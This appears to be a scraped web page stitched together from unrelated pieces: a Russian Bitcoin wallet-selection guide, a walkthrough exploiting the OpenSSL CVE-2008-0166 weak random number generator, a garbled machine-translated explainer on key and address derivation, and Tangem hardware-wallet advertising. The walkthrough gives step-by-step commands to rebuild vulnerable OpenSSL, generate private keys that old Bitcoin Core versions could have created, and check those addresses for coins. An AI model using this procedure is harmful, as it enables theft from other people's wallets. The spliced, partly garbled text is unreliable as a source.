Биткоин-кошельки: зачем и как хранить свои приватные ключи
Итак, вы приобрели немного биткоинов, и теперь столкнулись со следующим вопросом: как их лучше всего хранить? Мы поможем вам подобрать тот кошелек, который подойдет именно вам.
Хотя ничего сложного, на первый взгляд, в этом нет, выбор кошелька сопряжен с немалым количеством нюансов. Сколько у вас биткоинов? Как часто вы планируете их тратить? Вы уверены, что ваши ключи в большей безопасности, чем в холодном кастодиальном хранилище? Ответы на эти вопросы помогут найти правильное решение именно для вас.
Биткоин является активом на предъявителя, а это значит, что вы можете хранить ключи от своих биткоинов самостоятельно. Когда вы храните свои собственные биткоин-ключи, вы напрямую контролируете свои деньги. Таким образом, вам не приходится обращаться к услугам третьей стороны (например, банку) и доверять ей. Поэтому, как только вы с уверенностью сможете заявить, что риск личного хранения ваших ключей ниже, чем риск потери их кастодиальным хранителем, становится просто необходимо настроить схему самостоятельного хранения собственных биткоинов. Принятие этого решения зависит, главным образом, от вашего понимания того, как и зачем хранить свои собственные биткоин-ключи. В этой статье мы поможем вам прийти к пониманию как первого, так и второго.
В этой статье мы рассмотрим следующие аспекты:
- “Не твои ключи — не твои биткоины”
- Безопасность против удобства
- Разновидности биткоин-кошельков
- Мультиподпись (мультисиг)
- Наша рекомендация по выбору оптимального кошелька именно для ВАС
Ну что ж, начнем!
Биткоин — актив на предъявителя
В криптографии публичный ключ используется для шифрования сообщений, а приватный ключ — для их расшифровки. Если кто-то хочет отправить вам зашифрованное сообщение, он шифрует его вашим публичным ключом. Ваш приватный ключ — единственный способ расшифровать это сообщение, поэтому, пока вы — единственный владелец приватного ключа, никому кроме вас не удастся прочитать это сообщение.
Биткоин использует криптографию публичного и приватного ключей для обеспечения безопасности транзакций. При создании биткоин-кошелька создается приватный ключ. Кошелек создает публичные ключи, которые хешируются и используются в качестве адресов для получения биткоинов. Приватный ключ необходим для подтверждения владения биткоинами, хранящимися по соответствующему адресу. Он же предоставляет возможность потратить монеты.
Если вы лично не контролируете приватные ключи, связанные с вашими биткоинами, то на самом деле вы не являетесь обладателем своих биткоинов. Другими словами, если биржа или банк хранит ваши биткоины от вашего имени, вы не контролируете свои монеты напрямую. Вы передаете ответственность за обеспечение безопасности своих биткоинов третьей стороне, а вместе с ответственностью вы передаете и сами монеты.
Чтобы в полной мере воспользоваться уникальными свойствами Биткоина в качестве денег, вам необходимо самостоятельно контролировать собственные приватные ключи. Как часто говорят сами биткоинеры, “не твои ключи — не твои биткоины”. Самостоятельное хранение приватных ключей позволяет убедиться в том, что ваши монеты не могут ни конфисковать, ни изъять, ни украсть. Но решение хранить свои собственные ключи делает вас ответственным за безопасность собственных биткоинов. Наша цель — помочь вам освоиться с перспективой хранения своих собственных ключей.
Теперь рассмотрим возможные варианты управления собственными биткоин-ключами.

безопасность против удобства
Компромиссы кастодиального хранения
Главный выбор, который придется сделать при хранении биткоинов — это соотношение безопасности и удобства. Очевидно, что безопасность и удобство — это важные и необходимые характеристики при хранении чего-либо, однако они прямо противоположны друг другу.
Вопрос заключается в том, где непосредственно в спектре «Безопасность — Удобство» вы находитесь.

Чтобы лучше понять, какой способ хранения является наиболее оптимальным именно для вас, примите во внимание следующее:
- Общая стоимость — храните ли вы порядка 0,1%, 1% или более 10% вашего капитала в биткоинах? Наиболее приемлемый способ хранения ваших биткоинов напрямую зависит от ответа на этот вопрос. Очевидно, вы будете готовы испытать определенные неудобства, если это гарантирует более надежную защиту 50% вашего капитала.
- Сроки / Доступность — Когда и как часто вам необходимо тратить свои биткоины? Данный биткоин-кошелек является скорее текущим счетом, среднесрочным сберегательным счетом или больше напоминает долгосрочный пенсионный счет?
Профессиональный совет: не усложняйте схему хранения до такой степени, чтобы самому забыть, как получить доступ к средствам. Интернет кишит историями биткоинеров о владельцах, потерявших свои монеты в силу использования слишком сложных настроек, в результате чего они забывали, как получить доступ к своим монетам.
Обзор кошельков: бумажные, аппаратные, мобильные, десктопные и мультисиг биткоин-кошельки
Теперь, когда вы решили приобрести биткоин (отличное решение), пришло время определиться, где хранить ваши монеты. В самом начале пути этот выбор может показаться ошеломляющим. В этом разделе мы предоставим краткий обзор возможных вариантов хранения. Как и большинство вещей в жизни, все сводится к компромиссам.
Бумажные биткоин-кошельки
Что это такое: пользователи распечатывают приватные ключи и адреса Биткоина на листе бумаги.
Плюсы: доступ к приватным ключам через интернет невозможен. Этот вариант подходит для длительного хранения.
Минусы: трудно сделать резервную копию, если вы потеряли лист бумаги, вы потеряли свои биткоины. Пользователи вынуждены ламинировать и хранить кошелек в пожароустойчивом месте. Для простоты траты биткоинов необходимо импортировать данные в программный или аппаратный кошелек.
Аппаратные биткоин-кошельки
Что это такое: пользователи хранят приватные ключи при помощи специального оборудования.
Плюсы: доступ к аппаратному кошельку получить гораздо проще, чем к бумажному; приватные ключи никогда не касаются интернета, что снижает риск их потери; эффективны для длительного хранения. Если вы потеряете свой аппаратный кошелек, вы можете использовать сид-фразу (фразу резервного копирования) для восстановления данных.
Минусы: необходимо создать резервную копию исходной фразы, которую обычно пишут на бумаге и поэтому у нее те же проблемы, что и бумажных кошельков. Если ваш аппаратный кошелек украдут, существует риск того, что ваши средства будут взломаны, хотя это значительно сложнее, чем украсть монеты с простого бумажного кошелька.
Примеры: Ledger, Trezor, Coldcard, BitBox
Мобильные биткоин-кошельки
Что это такое: пользователи хранят приватные ключи на мобильном устройстве.
Плюсы: простота в использовании; удобно для начинающих; хорошее решения для небольших сумм, удобно для повседневных платежей, даже учитывая, что не так много пользователей часто тратят свои биткоины прямо сейчас (слишком высокая выгода долгосрочного хранения).
Минусы: наименее безопасный вариант, поскольку приватные ключи хранятся на устройстве, подключенном к интернету. Если злоумышленник получает физический доступ к вашему телефону, средства могут быть оперативно отправлены на подконтрольные ему кошельки. Не подходит для длительного хранения.
Примеры: Blockstream Green, Samourai (только Android)
Десктопные биткоин-кошельки
Что это такое: пользователи хранят приватные ключи на своем компьютере.
Плюсы: хороший UX; удобно для повседневных платежей, даже учитывая, что не так много пользователей часто тратят свои биткоины прямо сейчас (слишком высокая выгода долгосрочного хранения).
Минусы: не самый безопасный вариант, так как компьютеры,как правило, подключены к интернету и уязвимы к атакам -> не подходят для длительного хранения средств.
Примеры: Bitcoin Core, Wasabi, Electrum; Wasabi, вероятно, лучший биткоин-кошелек для Mac и один из лучших анонимных биткоин-кошельков.
Мультисиг биткоин-кошельки
Что это такое: пользователи хранят приватные ключи в специальном кошельке, для авторизации которого требуется несколько приватных ключей, в противном случае ваши средства не могут быть перемещены. Например, в мультисиг-кошельке “2-из-3” для отправки средств пользователю требуются любые два из трех приватных ключей.
Плюсы: один из самых безопасных способов хранения ваших биткоинов; снижает эффективность физических атак; схема пригодна для длительного хранения.
Минусы: более сложная схема настройки, но существует несколько сервисов, облегчающих процесс; тратить биткоины сложнее, но в этом и заключается суть схемы.
Примеры: хранилище Unchained Capital (2-из-3), Casa (2-из-3 и 3-из-5), Blocksteam Green (2-из-2), Electrum.

“Горячие” биткоин-кошельки против “холодных”: в чем разница?
Горячие кошельки подключены к интернету. Это означает, что ваши ключи доступнее, чем в случае с аппаратным кошельком. При этом ваши средства более уязвимы для хакеров. Горячие кошельки рекомендуются только для хранения и взаимодействия с небольшими суммами.
Холодные кошельки НЕ подключены к интернету. Это означает, что к вашим средствам сложнее получить доступ. Холодные кошельки не так удобны для пользователей, но злоумышленникам гораздо сложнее их взломать. Холодные кошельки следует рассматривать как единственный вариант для длительного хранения.
Резервные сид-фразы биткоин-кошельков
Большинство кошельков требуют записи “резервной сид-фразы”. Эта мера предосторожности предусмотрена на случай, если вы потеряете доступ к своим приватным ключам и/или кошельку. Это также означает, что пользователи должны проявлять особую осторожность со своими резервными копиями, поскольку они содержат всю необходимую информацию для доступа к их средствам. Относитесь к резервным копиям так же, как относились бы к сокровищу.
Биткоин-кошельки, не использующие сид-фразу
Одним из способов хранения биткоинов являются кошельки, не использующие сид-фразу. Они предназначены для учетных записей с несколькими подписями (мультисиг), в которых пользователи не создают резервные копии, а полагаются на службу резервного копирования. Сервис Casa является лидером в данном сегменте благодаря своему мультисиг продукту Keymaster.

Мультисиг-кошельки: как это работает
Для перемещения ваших средств мультисиг-кошельки требуют нескольких подписей, а не единственную подпись с приватным ключом. Существует много способов создания мультисиг-кошелька, но в качестве примера предлагаем использовать схему “2-из-3”.
Для пользователя это означает, что 3 приватных ключа относятся к одному биткоин-кошельку. Чтобы перевести средства, для подписания транзакции вам нужно, как минимум, 2 приватных ключа из этих трех. Большинство пользователей физически/географически разделяют местоположение каждого ключа с целью дальнейшей минимизации рисков. Важно не оказаться “слишком изобретательным”, иначе можно обдурить самого себя и потерять собственные средства (это случалось не раз).
Как упоминалось выше, вот несколько примеров мультисиг-кошельков:
- Green Wallet by Blocksteam (2-из-2)
- Keymaster by Casa (2-из-3 и 3-из-5)
- Unchained Capital (2-из-3)
- Electrum
Преимущества схемы мультисиг
Мультисиг допускает место для ошибки. Если у вас только один приватный ключ и вы его потеряете, получить доступ к средствам будет невозможно. Однако, если вы используете настройку 2-из-3, то в случае потери одного из приватных ключей вы при этом не лишаетесь доступа к своим средствам.
Мультисиг также снижает уровень опасности физических атак. Допустим, вам угрожают физически и заставляют отказаться от ваших биткоинов. Если бы у вас был обыкновенный кошелек (не мультисиг), то вам бы, скорее всего, пришлось передать доступ к вашим сбережениям атакующему. Однако, если вы настроили схему мультисиг, один из ваших ключей находится у вас, а другие — в отдаленной локации (например, в офисе и в сейфе). Подобное географическое разделение ключей значительно снижает стимул для злоумышленника преследовать вас и ваши сбережения.
Наша рекомендация: выбирайте биткоин-кошелек в зависимости от процентной доли хранящихся чистых активов
Самый простой способ определиться со способом хранения биткоинов — сосредоточиться на том, “сколько денег поставлено на карту”. Другими словами, какой процент вашего собственного капитала хранится тем или иным способом? Это — наш взгляд на ситуацию, но, конечно, каждый должен принимать собственное решение. Используйте эту статью скорее как ориентир, чем как универсальное решение:
Небольшие суммы (~ 0,1% собственного капитала) — мобильный биткоин-кошелек
- Blockstream Green — обладает встроенной функцией мультисиг 2-из-2. Это, пожалуй, лучший биткоин-кошелек для iPhone.
- Casa Keymaster (режим с одним приватным ключом) — резервное копирование без использования сид-фразы.
Средние суммы (~ 1% собственного капитала) — аппаратный биткоин-кошелек
Большие суммы (более 10% собственного капитала) — мультисиг биткоин-кошелек
- Casa Keymaster Multisig — простой в использовании интерфейс, можно выбрать схему 2-из-3 или 3-из-5. Casa предлагает инструмент самовосстановления, однако лично я его не использовал и, прежде чем рекомендовать, хотел бы провести дополнительные исследования,.
- Unchained Capital Multisig — простой в использовании интерфейс, настройка 2-из-3, возможность получить доступ к финансовым услугам на основе вашего биткоин-депозита.
- Самостоятельно настроенная схема мультисиг — пользователи могут самостоятельно создавать и настраивать схему мультисиг. Это требует определенных технических знаний по сравнению с использованием сервисов, но плюсом данного решения выступает повышенный уровень конфиденциальности.
Профессиональный совет: диверсифицируйте ваши настройки долгосрочного хранения. Если значительная часть вашего капитала хранится в Биткоине, в ваших интересах диверсифицировать свои активы. Это сглаживает возможные риски потери всех средств. Например, храните треть своих биткоинов с помощью Casa, треть с Unchained Capital, а оставшуюся треть на бумажном кошельке.
Подведем итоги
Это вкратце — наш взгляд на самостоятельное хранение биткоинов. Если вы все еще не уверены в собственных силах, не переживайте. Мы рекомендуем вам взять свои биткоин-ключи под контроль только тогда, когда вы освоитесь со всеми сопутствующими особенностями. Но мы призываем вас продолжить погружаться в подробности уникальной возможности, предоставляемой Биткоином: способность полностью контролировать свои собственные сбережения.
Самостоятельное хранение упрощается с каждым днем. Оцените свою ситуацию и выберите самый оптимальный для себя способ хранения. Мы здесь, чтобы помочь, обращайтесь с любыми вопросами.
Эта статья подготовлена и переведена командами Swan Bitcoin и Bitcoin Translated.
Поиск монет BTC на более ранних версиях Bitcoin Core критической уязвимость OpenSSL 0.9.8 CVE-2008-0166
В этой статье мы создадим инструмент который будет генерировать Биткоин Адреса (P2PKH), используя уязвимость CVE-2008-0166. Это исследовательский проект для поиска монет BTC на более ранних версиях программного клиента Bitcoin Core

Генератор случайных чисел, который генерирует предсказуемые числа CVE-2008-0166
Критической уязвимость версии OpenSSL 0.9.8 CVE-2008-0166 заполнялась только идентификатором процесса. Из-за различий между порядком байтов и sizeof(long) выходные данные зависят от архитектуры: 32-битный прямой порядок байтов (например, i386 ), 64-битный прямой порядок байтов (например, amd64, ia64 ), 32-битный прямой порядок байтов (например, powerpc, sparc). PID 0 — это ядро, а PID_MAX (32768) не достигается при переносе, поэтому для каждой архитектуры было 32767 возможных потоков случайных чисел.

Программный клиент Bitcoin Core использует библиотеку OpenSSL . В частности, он использует функцию «EC_KEY_generate_key()» для генерации Биткоин Адресов (например, ключа) для получения платежей. Старые версии Bitcoin Core генерируют и хранят 100 ключей в wallet.dat
Новый ключ генерируется только при получении Биткоин платежа. Таким образом, программный клиент Bitcoin Core сохраняет пул из 100 неиспользуемых Биткоин Ключей (адресов). Состояние внутреннего генератора случайных чисел зависит от того, какие другие вызовы были сделаны в библиотеке OpenSSL до вызова ‘EC_KEY_generate_key()’ . Вызовы, влияющие на внутреннее состояние ГСЧ: «RAND_add(8)», «RAND_bytes(8)» и «RAND_bytes(32)».
Таким образом, исследование заключалось в том, чтобы просмотреть множество старых источников Биткоина, чтобы выяснить, какие вызовы были сделаны, которые повлияли на внутреннее состояние ГСЧ перед вызовом «EC_KEY_generate_key()». Путь вызова меняется между версиями программного клиента Bitcoin Core
Исследование было сосредоточено на следующих версиях:

Наше цель сгенерировать приватные ключи для каждой версии программного клиента Bitcoin Core, для каждой архитектуры (le32/le64) , для каждого идентификатора процесса и для Биткоин Адресов (P2PKH) , используя случайное число из критической уязвимости OpenSSL 0.9.8.
В конечном итоге мы создадим Генератор Биткоин Адресов (P2PKH) и все будет сохранятся в файл result.txt

Сделаем OpenSSL снова уязвимым

cat /etc/lsb-release

Давайте перейдем в репозиторию «CryptoDeepTools» и разберем всё в детали
git clone https://github.com/demining/CryptoDeepTools.git cd CryptoDeepTools/05VulnerableOpenSSL/ ls -lh

Обновим и установим g++ libgmp3-dev libmpfr-dev
apt-get update sudo apt-get install g++ -y

sudo apt-get install libgmp3-dev libmpfr-dev -y


Для того чтобы OpenSSL снова сделать уязвимым как в CVE-2008-0166
Скачаем openssl-0.9.8c.tar.gz и пропатчим системные файлы
wget https://ftp.openssl.org/source/old/0.9.x/openssl-0.9.8c.tar.gz


tar xfz openssl-0.9.8c.tar.gz

mv openssl-0.9.8c openssl-0.9.8c-vuln cd openssl-0.9.8c-vuln

ls -lh

patch -p1

В системе LE-64 используем:
./Configure linux-x86_64 shared no-ssl2 no-ssl3 no-comp no-asm

make depend all

Перейдем обратно в каталог content/
cd / ls

cd content/CryptoDeepTools/05VulnerableOpenSSL/ ls -lh

Компиляция:
gcc -o cryptodeepbtcgen cryptodeepbtc.c -I./openssl-0.9.8c-vuln/include -L./openssl-0.9.8c-vuln -lssl -lcrypto ls -lh

LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -h

Все поддерживаемые версии программного клиента Bitcoin Core:
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l

crypto > LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -l #0 - 0.3.24 #1 - 0.8.6-d #2 - 0.8.6-qt #3 - 0.9.1-d #4 - 0.9.4-d #5 - unknownA #6 - unknownB #7 - unknownC #8 - unknownD #9 - unknownE #10 - unknownF #11 - unknownG #12 - unknownH #13 - unknownI #14 - unknownJ #15 - unknownK #16 - unknownA0 #17 - unknownA1 #18 - unknownA2 #19 - unknownA3 #20 - unknownA4 #21 - unknownB0 #22 - unknownB1 #23 - unknownB2 #24 - unknownB3 #25 - unknownC0 #26 - unknownC1 #27 - unknownC2 #28 - unknownD0 #29 - unknownD1 #30 - unknownD2 #31 - unknownD3 #32 - unknownD4 #33 - unknownD5 #34 - unknownE0 #35 - unknownA0x #36 - unknownA1x #37 - unknownA2x #38 - unknownA3x #39 - unknownA4x #40 - unknownB0x #41 - unknownB1x #42 - unknownB2x #43 - unknownB3x #44 - unknownC0x #45 - unknownC1x #46 - unknownC2x #47 - unknownD0x #48 - unknownD1x #49 - unknownD2x #50 - unknownD3x #51 - unknownD4x #52 - unknownD5x #53 - unknownE0x crypto >
Запуск cryptodeepbtcgen -n 32 -v 0:
LD_LIBRARY_PATH=./openssl-0.9.8c-vuln/ ./cryptodeepbtcgen -n 32 -v 0 >> result.txt

Все сохранится в хранилище файлов Google Drive как текстовый файл result.txt

Проверяем закрытый ключ!

Далее остается проверить все сгенерированные Биткоин Адреса на наличие монет BTC, для этого мы можем воспользоваться Python-скриптом: bitcoin-checker.py
Русские Блоги
Процесс генерации приватного ключа и адреса биткойнов

Закрытый ключ
Суть закрытого ключа - это 256-битное случайное число, состоящее из 0 и 1. Неважно, как генерируется это случайное число, если оно непредсказуемо и не повторяется, например, вы можете рассматривать лицевую и обратную сторону монеты как 0 И 1, а затем случайным образом подбрасывать 256 раз, строка записанных чисел может использоваться в качестве личного ключа. В биткойнах формат закрытого ключа состоит в том, чтобы отображать это 256-битное случайное число в виде 64-битного шестнадцатеричного числа, то есть 64 (шестнадцатеричное число занимает 4 бита). «Искаженный» состоит из чисел. Вот закрытый ключ:
1E99423A4ED27608A15A2616A2B0E9E52CED330AC530EDCC32C8FFC6A526AEDD
Некоторые люди могут задаться вопросом, будет ли дублирован этот закрытый ключ, то есть два идентичных закрытых ключа.Размер пространства закрытого ключа биткойна составляет 2 ^ 256, что составляет около 10 ^ 77 в десятичном виде. Во вселенной число атомов находится между 10 ^ 78 и 10 ^ 82, поэтому пространство закрытого ключа является большим числом, и можно считать, что не существует двух идентичных закрытых ключей.
Открытый ключ
Открытый ключ - это умножение закрытого ключа на эллиптическую кривую ( K = k * G ,из их k Это закрытый ключ, G Является ли постоянная точка, называемая точкой генерации, и K Получается по алгоритму «открытый ключ»), что является необратимым процессом, то есть невозможно обратно вычислить закрытый ключ, рассчитанный из открытого ключа.
Алгоритм шифрования эллиптической кривой
Эллиптическая кривая шифрования(Нажмите на ссылку, чтобы узнать больше). Это асимметричный метод шифрования, основанный на проблеме дискретного логарифма, который может быть выражен путем добавления или умножения точек на эллиптической кривой. На следующем рисунке приведен пример эллиптической кривой:
Биткойн использует Национальный институт стандартов и технологий (NIST) secp256k1 Специальная эллиптическая кривая и ряд математических констант, определенных стандартом. Кривая secp256k1 определяется следующей функцией, которая может генерировать эллиптическую кривую, а затем использовать эту кривую для генерации открытого ключа. 
Создать открытый ключ
Как упоминалось ранее, закрытый ключ в биткойнах может быть получен после вычисления умножения эллиптической кривой, и процесс необратим, то есть открытый ключ может быть получен только из закрытого ключа, а не из правильного открытого ключа. Процесс расчета кривой умножения.
Во-первых, ранее упомянутый закрытый ключ и точка генерации G Умножьте, чтобы получить открытый ключ K :
K = 1E99423A4ED27608A15A2616A2B0E9E52CED330AC530EDCC32C8FFC6A526AEDD * G
Открытый ключ K Определяется как точка K = (x, y) из их
x = F028892BAD7ED57D2FB57BF33081D5CFCF6F9ED3D3D7F159C2E2FFF579DC341A y = 07CF33DA18BD734C600B96A72BBC4749D5141C90EC8AC328AE52DDFE2E505BDB

Наша цель - найти точку генерации G Несколько точек kG На эллиптической кривой добавление точек эквивалентно рисованию касательной из этой точки, чтобы найти другую точку, которая пересекает кривую и затем сгибается по оси x. На рисунке ниже показаны геометрические операции нахождения G, 2G и 4G на эллиптической кривой.
Биткойн-адрес
Биткойн-адрес получается из открытого ключа через серию однонаправленных хеш-алгоритмов. Алгоритм хэширования - это односторонняя функция, которая может принимать любую длину ввода для генерирования отпечатка пальца или хэша. Алгоритмы, используемые для генерации адреса Биткойн из открытого ключа, - это алгоритм безопасного хэширования (SHA) и дайджест сообщения оценки примитивов RACE (RIPEMD). SHA256 с RIPEMD160 。
Открытый ключ K В качестве входных данных рассчитайте его SHA256 Хеш, а затем рассчитать RIPEMD160 Хэш, получающееся 160-битное (20-байтовое) число является адресом биткойнов.
A = RIPEMD160(SHA256(K)) //из ихKЯвляется ли открытый ключ, а A - адрес Биткойн

Однако мы обнаружим, что сгенерированный биткойн-адрес отличается от того, что обычно видят наши пользователи. Это связано с тем, что для улучшения читаемости, избежания неоднозначности и эффективного предотвращения ошибок в транскрипции и вводе адресов мы видим бит Адрес валютыBase58CheckЗакодированная, следующая диаграмма описывает процесс генерации биткойн-адреса из открытого ключа:
Tangem. Your wallet.

Slim as a bank card, secure as a bank vault. Store, buy, earn, transfer and swap thousands of coins and tokens.
- Swiss-based
- 25-year warranty
- EAL6+ security standard
- Audited by Kudelski Security & Riscure
Tangem is redefining the wallet experience by delivering top-level security, simplicity and accessibility. Enjoy complete autonomy and independence while managing your assets with a single tap. Tangem Wallet breaks down barriers for crypto newcomers and enhances the custodial experience for advanced users.
Tangem is redefining the wallet experience by delivering top-level security, simplicity and accessibility. Enjoy complete autonomy and independence while managing your assets with a single tap. Tangem Wallet breaks down barriers for crypto newcomers and enhances the custodial experience for advanced users.
Simply tap the card to your phone to use Tangem Wallet.
During the activation process, the card’s embedded chip generates a random private key, ensuring that the wallet cannot be compromised.
Wallet activation takes less than  



A Tangem Wallet set can contain up to three Tangem cards. You get three equal cards to one wallet, just like having three identical keys to your room door.
Smart backup.
Cutting-edge technology developed by Tangem engineers.
- The chip in the card generates a random private key which never gets exposed.
- The cards establish a secure connection with each other and transfer your encrypted private keys
- Keys are stored on three cards with no other copies to be found across space and time.
Zero out of 1,000,000
cards hacked since 2018
Tangem Chip keeps you safe on two fronts
Biometric security
Access code protection
Discover the power of crypto with the Tangem app.





Manage
Swap
Buy
Sell
Earn
Earn Coming soon
- Download on the App Store
- Get it on Google Play
- Android APK Download
- Scan QR
Access to thousands of digital assets.



Meet Tangem Chip.
At the heart of every Tangem Wallet is a powerful, certified chip developed in collaboration with Samsung Semiconductor . Every card comes with an inbuilt chip, taking the form of a 1 x 1 mm microcomputer.
- The highest chip security standard. Protection from any invasive and non-invasive attacks.
- Maximum resistance to dust, water and temperature extremes (–25° to 50°C).
- Environmental protection. Resistance to X-rays, electromagnetic pulses and electrostatic discharge.
- Just a chip with an antenna. No points of vulnerability or elements that are prone to failure.
- Counterfeit protection. The app verifies the authenticity of both the chip and the firmware.
- Always ready to go. No need to charge.
Independent firmware audit
The Tangem firmware has two independent audits under its belt: first in 2018 by the Swiss company Kudelski Security and another in 2023 by Riscure , an international security lab. Both audits confirmed that the firmware has no backdoors or vulnerabilities, is not updatable, and contains no hidden algorithms.
Open source. Verified by community
There are no backdoors in our app: check it out for yourself on GitHub. The app can be recreated even if it's needed. We don’t collect any personal data or run servers to conduct transactions on the blockchain.

Guaranteed for 25+ years
We are confident that, when used correctly, your Tangem Wallet will remain safe for at least 25 years. The hermetic plastic construction guarantees that the chip will remain secure, even in the depths of the Mariana Trench.
Trust -based choice.
Worldwide average score
Google Play
Worldwide average score

Tangem Wallet offers the latest example of what the future of crypto will look like for its next billion users.
13M monthly readers


The team boasts a simple and secure user experience across the 170 countries the company operates in. Tangem is also the first company to successfully implement the concept of a seedless wallet.
8M monthly readers


Finally we have a nice way to use crypto without being a Stone Age: like a writing words on the wall.

Tangem is one of the most unique hardware wallets I've ever seen. It's so easy to use — with a tap of a card on the back of your phone. And it's secure, given that it has a super low attack surface area. That's why I use Tangem as my crypto cash wallet where I can send funds quickly and efficiently.
I love this wallet, price well enough to get multiple cards, easy to use, no restrictions on crypto assets, and it's a great way to share with my kids to teach them how crypto will be used.

I'm not replacing TANGEM for anything in the world. Since i using it, I have been reborn, there is no more secure, easy to use and fast hardware wallet. Love it!

Storing crypto safely should be simple and cheap, Tangem enables that.

Tangem is seriously a game-changer — they've taken something as complex as crypto storage and made it a breeze to understand and use. The best part? It's super affordable, incredibly secure, and built tolast. No other wallet even comes close.

This is the Swiss Army knife of crypto wallets.

If blockchain technology is to be mass-adopted, crypto storage solutions should combine speed, simplicity and security. Those are the very pillars Tangem stands on, offering THE perfect wallet for both new and advanced users. Anyway, check it out yourself and you'll see that self-custody has never been easier!
Brilliant application, easy to use and friendly interface !!but what I like the most is the app is multi chain and you can choose the fees u wanna pay for transactions especially on Ethereum network and that’s a BIG plus from me!
Review, United Kingdom

Tangem is Nr.1 in BENZINGA's Best Crypto Wallets Ranking.

This is the future! Seriously who wants to deal with the stress of storing their seed phrase and be prone to hacks. this solves that problem. The card has your private keys as long as you have the card you’re good to go and you can set a pin to all the cards. If 3 cards are not enough you can order 3 more.
Get answers to your questions.
In anticipation of your questions, we've answered the most common ones. Help Center and online support available 24 hours a day, 7 days a week.
Join community
Join community
Why do I need a hardware wallet?
The primary benefit of owning a hardware crypto wallet is its enhanced security. Because the private keys are stored offline in the device, it is less vulnerable to hacking attacks or malware that might infect your computer. This reduces the risk of losing your digital assets to theft or fraud. The other major advantage is complete independence. You own your keys and can use your crypto anytime without permission from any third party.
What makes Tangem wallet different from other cold wallets?
Simplicity and security. Your Tangem wallet can be with you anytime; there is no need to charge or connect it with wires. The cards can fit in a pouch with your other credit cards, so you can sign your transactions anywhere. Tangem Wallet is also very easy to use: Just tap the card on your phone to access your crypto. In addition to convenience, the card’s EAL6+ certified chip is as secure as a biometric passport. Simply put, if other hardware wallets were made by geeks for geeks, we combined flawless simplicity and advanced security to make Tangem Wallet for everyone.
What’s the difference between a 2-card and a 3-card set?
A 3-card set gives you a better chance at recovering access to your wallet than a 2-card set. If one card is lost or stolen, you can use the other card to access your wallet. But if you lose one card AND forget your access code, you’ll need a third card to reset the access code. Therefore, we recommend getting the 3-card set.
Do my cards depend on Tangem’s servers or infrastructure?
Using the best technology humanity has to offer, we painstakingly designed our products to be fully autonomous. Neither Tangem servers nor services are participating or have access to your crypto activities. There is only your card, your phone, and the blockchain. Our products will remain functional in any circumstance: the Tangem App code is available on GitHub; it can be rebuilt even if Apple and Google remove it from their app stores.
If a Tangem Wallet card is stolen, can a third party gain access to the wallet?
No. An access code protects the wallet against unauthorized access by third parties and brute-force attacks.
Can I use a seed phrase in the wallet?
Using a seed phrase is optional. There are three ways of key generation in the new Tangem wallet: Using the certified True Random Number Generator TRNG, which generates and stores the keys inside the cards’ chips. Neither Tangem nor anyone else knows it. And no copies exist in space and time outside your Tangem cards (recommended). Generating a seed phrase with the Tangem app and importing it to the card. Importing your seed phrase from another wallet. Unlike the keys the card generates, seed phrases can be copied and stolen. Learn more about seed phrase technology and our opinion here.
Will I lose access to my funds if my phone is lost or broken?
No, you will not lose access to your funds. You can use your card to access your wallet via any other mobile device. You just have to download the Tangem app on another phone and scan your Tangem cards. Remember, your phone doesn't store sensitive information; it’s just a screen that provides the wallet’s UI for easy access. You can use the Tangem wallet on two or more phones; the number doesn't matter because your wallet’s private keys are stored in the card’s chip.
Choose your Tangem.
New Tangem Wallet is in stock, choose between 3 or 2 cards set.